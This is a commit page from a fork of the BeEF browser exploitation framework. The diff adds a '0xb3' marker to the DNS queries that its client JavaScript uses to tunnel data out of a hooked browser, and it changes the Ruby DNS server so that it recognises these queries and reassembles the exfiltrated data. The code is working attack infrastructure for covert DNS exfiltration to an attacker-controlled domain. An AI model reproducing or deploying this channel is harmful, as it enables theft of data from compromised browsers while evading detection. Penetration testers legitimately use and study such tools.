Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

#970 Added string to DNS requests to differentiate between normal and data-extrusion DNS requests

Browse Source
This commit is contained in:
antisnatchor
2014-06-29 13:04:51 +02:00
parent f7df45ebd1
commit d1688395ae
2 changed files with 11 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

4
core/main/client/net/dns.js
View File

@@ -71,11 +71,13 @@ beef.net.dns = {
var segments = encodedData.chunk(max_data_segment_length);
var ident = "0xb3"; //see extensions/dns/dns.rb, useful to explicitly mark the DNS request as a tunnel request
//TODO remove this
console.log(segments.length);
for (var seq=1; seq<=segments.length; seq++) {
sendQuery(msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
sendQuery(ident + msgId + "." + seq + "." + segments.length + "." + segments[seq-1] + "." + domain);
}
// callback - returns the number of queries sent

11
extensions/dns/dns.rb
View File

@@ -140,9 +140,14 @@ module BeEF
@lock.synchronize do
print_debug "Received DNS request (name: #{name} type: #{format_resource(resource)})"
# no need to parse AAAA resources when data is extruded from client
if format_resource(resource) == 'A'
reconstruct(name)
# no need to parse AAAA resources when data is extruded from client. Also we check if the FQDN starts with the 0xb3 string.
# this 0xb3 is convenient to clearly separate DNS requests used to extrude data from normal DNS requests than should be resolved by the DNS server.
if format_resource(resource) == 'A' and name.match(/^0xb3/)
reconstruct(name.split('0xb3').last)
catch (:done) do
transaction.fail!(:NXDomain)
end
return
end
catch (:done) do